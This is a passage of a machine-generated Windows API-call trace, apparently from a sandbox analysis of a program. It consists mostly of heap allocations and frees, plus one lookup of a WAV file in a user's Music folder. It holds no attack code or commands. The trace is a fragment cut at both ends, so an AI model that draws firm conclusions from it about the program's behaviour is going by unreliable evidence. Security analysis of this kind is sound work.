HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ab8 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0208.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0208.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0208.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0208.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0208.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.458] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0208.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.458] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0208.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0208.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0208.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0208.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0208.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.463] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21cea590, ftCreationTime.dwHighDateTime=0x1d5cc18, ftLastAccessTime.dwLowDateTime=0x6a2417d0, ftLastAccessTime.dwHighDateTime=0x1d5cd6c, ftLastWriteTime.dwLowDateTime=0x6a2417d0, ftLastWriteTime.dwHighDateTime=0x1d5cd6c, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="_qp6.wav", cAlternateFileName="")) returned 0x9e1db8 [0208.463] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0208.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 